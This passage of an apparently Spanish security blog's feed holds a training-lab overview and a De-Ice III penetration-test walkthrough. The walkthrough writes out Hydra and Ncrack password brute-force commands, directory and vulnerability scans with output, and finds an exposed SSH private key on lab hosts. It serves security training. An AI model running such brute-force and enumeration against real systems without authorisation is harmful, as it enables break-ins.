<li><a href="http://www.virtualbox.org/" target="_blank">VirtualBox</a></li>
<li><a href="http://xen.org/" target="_blank">XEN</a></li>
<li><a href="http://www.qemu.org/" target="_blank">QEMU</a></li>
<li><a href="http://www.microsoft.com/windows/virtual-pc/" target="_blank">Virtual PC</a></li>
<li><a href="http://www.vmware.com/" target="_blank">VMWare</a></li>
<li>Diferentes S.O</li>
<li>Tools</li>
</ul>
</li>
<li>Laboratorios de Test de Penetración
<ul>
<li>Evaluación activa de las medidas de seguridad de la información</li>
<li>Metodologías</li>
<li><a href="http://www.sec-track.com/issaf-information-system-security-assessment-framework" target="_blank">ISSAF</a></li>
<li><a href="http://www.sec-track.com/metodologia-nist-sp-800-42" target="_blank">NIST SP 800-42</a></li>
<li><a href="http://labs.dragonjar.org/category/ceh" target="_blank">EC-Council (CEH)</a></li>
<li><a href="http://www.sec-track.com/objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos" target="_blank">De-Ice PenTest LiveCDs</a></li>
<li><a href="http://www.sec-track.com/objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos" target="_blank">PwnOS</a></li>
<li><a href="www.damnvulnerablelinux.org" target="_blank">DVL</a></li>
<li><a href="http://labs.dragonjar.org/category/owasp" target="_blank">WebGOAT</a></li>
<li><a href="www.dvwa.co.uk" target="_blank">Damn Vulnerable Web App</a></li>
<li><a href="http://www.sg6.es/labs/" target="_blank">Sauron 1.0</a></li>
<li><a href="www.foundstone.com" target="_blank">FoundStone</a></li>
<li><a href="www.BadStore.net" target="_blank">BadStore</a></li>
<li><a href="http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica" target="_blank">TurnKey Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Hardening
<ul>
<li><a href="https://projects.honeynet.org/honeywall" target="_blank">Honeywall CD-Rom</a></li>
<li><a href="http://labs.dragonjar.org" target="_blank">Labs Hardening Windows-GNU/Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Análisis Forense Digital
<ul>
<li><a href="www.seguridad.unam.mx/eventos/reto/" target="_blank">Retos Forenses UNAM</a></li>
<li><a href="www.DragonJAR.org" target="_blank">Reto Forense Comunidad DragonJAR</a></li>
<li><a href="www.honeynet.org/challenges" target="_blank">HoneyNet Project Challenges</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Análisis de Malware
<ul>
<li><a href="www.Sec-Track.com" target="_blank">Windows-GNU/Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Muchos otros Entornos/Ideas/Posibilidades
<ul>
<li>CTF</li>
<li>Campus Party</li>
<li>Criptogramas</li>
<li>Crackmes</li>
<li>Hackme</li>
<li>WarGames</li>
</ul>
</li>
</ul>
<div id="__ss_3955409" style="width: 425px;"><strong style="display: block; margin: 12px 0 4px;"><a title="Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010" href="http://www.slideshare.net/4v4t4r/laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010">Laboratorios de Entrenamiento en Seguridad Informática &#8211; FLISOL 2010</a></strong></p>
<div style="padding: 5px 0 12px;">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/4v4t4r">4v4t4r</a>.</div>
</div>
<p style="text-align: center;"><object id="__sse3955409" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=labssec-track-100503191659-phpapp02&amp;stripped_title=laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010" /><param name="name" value="__sse3955409" /><param name="allowfullscreen" value="true" /><embed id="__sse3955409" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=labssec-track-100503191659-phpapp02&amp;stripped_title=laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010" name="__sse3955409" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>En el transcurso de algunos días estaré publicando en detalle cada uno de estos (y mucho más) entornos de entrenamiento, como objetivos de aprendizaje colaborativo en el Proyecto Sec-Track.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades#comments</comments>
		<pubDate>Wed, 07 Apr 2010 03:06:12 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Hydra]]></category>
		<category><![CDATA[JBroFuzz]]></category>
		<category><![CDATA[Ncrack]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=505</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Enumeración de usuarios Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos: FTP Hydra: root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36 SSH Hydra: root@bt:~# [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Enumeración de usuarios" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios">Desarrollo del entorno De-Ice III – Enumeración de usuarios</a></strong></p>
<p style="text-align: justify;">Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos:</p>
<p style="text-align: justify;"><strong>FTP</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong>SSH</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:<br />
</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong><a href="http://nmap.org/ncrack/" target="_blank">Ncrack</a>:</strong></p>
<p style="text-align: justify;">root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt</p>
<p style="text-align: justify;">Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.</p>
<p style="text-align: justify;">Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos <a href="http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project" target="_blank"><strong>OWASP Dirbuster</strong></a> para identificar directorios y archivos.</p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /level.html &#8211; 200<br />
File found: /copyright.txt &#8211; 200<br />
File found: /index2.html &#8211; 200</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /home/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /200711_002.pdf &#8211; 200<br />
File found: /200611_001.pdf &#8211; 200<br />
File found: /200711_004.pdf &#8211; 200<br />
File found: /Acceptable_Use_Policy.pdf &#8211; 200<br />
File found: /Audit_Policy.pdf &#8211; 200<br />
File found: /Email_Policy.pdf &#8211; 200</p>
<p style="text-align: justify;"><strong>Ahora con Nikto en modo default<br />
</strong></p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.100<br />
+ Target Hostname:    slax.example.net<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:14:41<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-0: DEBUG HTTP verb may show server debugging information<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 8 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:15:08 (27 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.101<br />
+ Target Hostname:    192.168.2.101<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:16:25<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-637: <strong>/~root/</strong>: Allowed to browse root&#8217;s home directory.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 7 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:16:54 (29 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;">Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (<strong>~root</strong>). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:</p>
<p style="text-align: justify;"><strong>Con netcat</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~root/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:36:11 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 557<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~pirrip/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:38:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 561<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~magwitch/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:40:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~havisham/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:42:27 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de  <a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong>Fuzzing</strong></a> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank"><strong>JBroFuzz</strong></a></p>
<p style="text-align: justify;">Veamos:</p>
<p style="text-align: justify;">Tenemos los posibles usuarios válidos del sistema:</p>
<p>pickwick<br />
winkle<br />
snodgrass<br />
tupman<br />
weller<br />
tweller<br />
havisham<br />
magwitch<br />
pirrip<br />
nickleby<br />
rnickleby<br />
noggs<br />
squeers<br />
pinch<br />
tapley<br />
gamp<br />
marley<br />
scrooge<br />
cratchit<br />
sikes<br />
dawkins<br />
claypole<br />
root</p>
<p>Los cuales a su vez pueden tener un directorio como el identificado para root</p>
<p>Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de<a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong> fuzzing</strong></a> de <strong> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank">JBroFuzz</a></strong>.</p>
<p>0,http://192.168.2.101/~pickwick,404,Not Found,No,No<br />
1,http://192.168.2.101/~winkle,404,Not Found,No,No<br />
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No<br />
3,http://192.168.2.101/~tupman,404,Not Found,No,No<br />
4,http://192.168.2.101/~weller,404,Not Found,No,No<br />
5,http://192.168.2.101/~tweller,404,Not Found,No,No<br />
<strong>6,http://192.168.2.101/~havisham,200,OK,No,No</strong><br />
<strong>7,http://192.168.2.101/~magwitch,200,OK,No,No</strong><br />
<strong>8,http://192.168.2.101/~pirrip,200,OK,No,No</strong><br />
9,http://192.168.2.101/~nickleby,404,Not Found,No,No<br />
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No<br />
11,http://192.168.2.101/~noggs,404,Not Found,No,No<br />
12,http://192.168.2.101/~squeers,404,Not Found,No,No<br />
13,http://192.168.2.101/~pinch,404,Not Found,No,No<br />
14,http://192.168.2.101/~tapley,404,Not Found,No,No<br />
15,http://192.168.2.101/~gamp,404,Not Found,No,No<br />
16,http://192.168.2.101/~marley,404,Not Found,No,No<br />
17,http://192.168.2.101/~scrooge,404,Not Found,No,No<br />
18,http://192.168.2.101/~cratchit,404,Not Found,No,No<br />
19,http://192.168.2.101/~sikes,404,Not Found,No,No<br />
20,http://192.168.2.101/~dawkins,404,Not Found,No,No<br />
21,http://192.168.2.101/~claypole,404,Not Found,No,No<br />
<strong>22,http://192.168.2.101/~root<strong>,200,OK,No,No</strong></strong></p>
<p>Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo</p>
<p>~havisham<br />
~magwitch<br />
~pirrip<br />
~root</p>
<p>Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.</p>
<p><strong>Al host 192.168.2.100</strong></p>
<p>4,http://192.168.2.100//icons/,200,OK,No,No<br />
784,http://192.168.2.100//index.php/123,200,OK,No,No<br />
<strong>802,http://192.168.2.100//info.php,200,OK,No,No</strong> (Y)</p>
<p><strong>Al host 192.1682.101</strong></p>
<p>4,http://192.168.2.101//icons/,200,OK,No,No</p>
<p>Ahora a los directorios identificados para los usuarios:</p>
<p><strong>Usuario havisham:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario magwitch:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario pirrip:</strong></p>
<p>385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No</p>
<p><strong>Usuario root:</strong></p>
<p>Ningún resultado de interés</p>
<p>Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip</p>
<p>http://192.168.2.101/~pirrip//.ssh/</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<p>En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Turnkey Linux, Proyecto de Appliances para la Implementación de Laboratorios de Seguridad Informática</title>
		<link>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica</link>
		<comments>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica#comments</comments>
		<pubDate>Mon, 29 Mar 2010 23:23:24 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Aseguramiento]]></category>
		<category><![CDATA[Gobierno IT]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Appliances]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Virtualización]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=509</guid>
		<description><![CDATA[Turnkey Linux es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática. Turnkey Linux pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática.</p>
<p style="text-align: justify;"><span id="more-509"></span><a href="http://www.turnkeylinux.org/" target="_blank"><strong>Turnkey Linux</strong></a> pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas y plataformas tecnológicas de uso común en empresas, instituciones académicas y gobierno electrónico.</p>
<p style="text-align: justify;">Estas imágenes (.iso y/o VMware) automáticamente una vez iniciadas pondrán en marcha el sistema que nosotros hayamos elegido. Habilitando además un perfecto sistema de administración como lo es <a href="http://www.webmin.com/" target="_blank"><strong>Webmin</strong></a> (aunque podemos administrarlo normalmente de manera local).</p>
<p style="text-align: justify;">Veamos un video demostrativo del proceso de ejecución de los entornos/appliances:</p>
<p style="text-align: center;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/g-xXHD051eg&amp;hl=en_US&amp;fs=1&amp;" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p style="text-align: justify;">Dichos sistemas están basados en la distribución Ubuntu, por lo que el proceso de actualización y administración se facilitará en gran medida.</p>
<p style="text-align: justify;">El uso de dicho proyecto como ambientes virtualizados de entrenamiento en seguridad es muy amplio. Pues con unos simple pasos (Descargar, bootear desde un equipo físico o máquina virtual) tendremos todo un entorno que asemejará uno real, para realizar las prácticas propuestas como entrenamiento (<a href="http://www.sec-track.com/aseguramiento" target="_blank"><strong>Hardening</strong></a>, <strong><a href="http://www.sec-track.com/test-de-penetracion" target="_blank">Penetration Test</a></strong>, <a href="http://www.sec-track.com/tag/vulnerability-scanning" target="_blank"><strong>Análisis  de Código en busca de vulnerabilidades</strong></a>, <a href="http://www.sec-track.com/criptografia" target="_blank"><strong>Análisis de Sistemas Criptográficos</strong></a>, <a href="http://www.sec-track.com/informatica-forense" target="_blank"><strong>Análisis Forense</strong></a>, <strong><a href="http://www.sec-track.com/?s=retos" target="_blank">CTF y Wargames</a></strong>).</p>
<p style="text-align: justify;">Algunos de los entornos disponibles son:</p>
<ul>
<li><a href="http://www.turnkeylinux.org/lamp" target="_blank">LAMP</a></li>
<li><a href="http://www.turnkeylinux.org/drupal6" target="_blank">Drupal</a></li>
<li><a href="http://www.turnkeylinux.org/fileserver" target="_blank">File Server</a></li>
<li><a href="http://www.turnkeylinux.org/openbravo" target="_blank">OpenBravo</a></li>
<li><a href="http://www.turnkeylinux.org/zimbra" target="_blank">Zimbra</a></li>
<li><a href="http://www.turnkeylinux.org/redmine" target="_blank">Redmine</a></li>
<li><a href="http://www.turnkeylinux.org/rails" target="_blank">Ruby on Rails</a></li>
<li><a href="http://www.turnkeylinux.org/torrentserver" target="_blank">Torrent Server</a></li>
<li><a href="http://www.turnkeylinux.org/domain-controller" target="_blank">Domain Controller</a></li>
<li><a href="http://www.turnkeylinux.org/moodle" target="_blank">Moodle</a></li>
<li><a href="http://www.turnkeylinux.org/mediawiki" target="_blank">MediaWiki</a></li>
<li><a href="http://www.turnkeylinux.org/wordpress" target="_blank">WordPress</a></li>
<li><a href="http://www.turnkeylinux.org/joomla" target="_blank">Joomla</a></li>
<li><a href="http://www.turnkeylinux.org/postgresql" target="_blank">PostGreSQL</a></li>
<li><a href="http://www.turnkeylinux.org/tomcat-apache" target="_blank">Tomcat on Apache</a></li>
<li><a href="http://www.turnkeylinux.org/phpbb" target="_blank">phpBB</a></li>
<li><a href="http://www.turnkeylinux.org/lapp" target="_blank">LAPP</a></li>
<li><a href="http://www.turnkeylinux.org/dokuwiki" target="_blank">DokuWiki</a></li>
<li><a href="http://www.turnkeylinux.org/projectpier" target="_blank">ProjectPier</a></li>
<li><a href="http://www.turnkeylinux.org/symfony" target="_blank">Symfony</a></li>
<li><a href="http://www.turnkeylinux.org/bugzilla" target="_blank">BugZilla</a></li>
<li><a href="http://www.turnkeylinux.org/mantis" target="_blank">Mantis</a></li>
<li><a href="http://www.turnkeylinux.org/ec2sdk" target="_blank">SDK for Amazon EC2</a></li>
</ul>
<p><a href="http://www.turnkeylinux.org/screenshots" target="_blank"><strong>ScreenShots del proyecto &gt;&gt;</strong></a></p>
<p><strong><a href="http://www.turnkeylinux.org/docs/installation-appliances-virtualbox" target="_blank">Tutorial de Instalaciónen VirtualBox &gt;&gt;</a></strong></p>
<p><a href="http://www.turnkeylinux.org" target="_blank"><strong>Más información y descargas del Proyecto Turnkey Linux &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Enumeración de usuarios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios#comments</comments>
		<pubDate>Fri, 12 Mar 2010 17:41:18 +0000</pubDate>
		<dc:creator>S3cTr4ck</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Enumeración de usuarios]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[SMTP]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=496</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos. Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles: 192.168.2.100 21/tcp  open   ftp      vsftpd 2.0.4 22/tcp  open   ssh      OpenSSH [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <a title="Permanent Link to Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-network-mapping-port-scanning">Desarrollo del entorno De-Ice III – Network Mapping, Port Scanning</a></p>
<p style="text-align: justify;">Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos.</p>
<p style="text-align: justify;">Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles:</p>
<p style="text-align: justify;"><span id="more-496"></span><strong>192.168.2.100 </strong></p>
<p style="text-align: justify;">21/tcp  open   ftp      vsftpd 2.0.4<br />
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)<br />
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7<br />
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)<br />
110/tcp open   pop3     Openwall popa3d<br />
143/tcp open   imap     UW imapd 2004.357<br />
443/tcp closed https</p>
<p style="text-align: justify;"><strong>192.168.2.101</strong></p>
<p style="text-align: justify;">80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)</p>
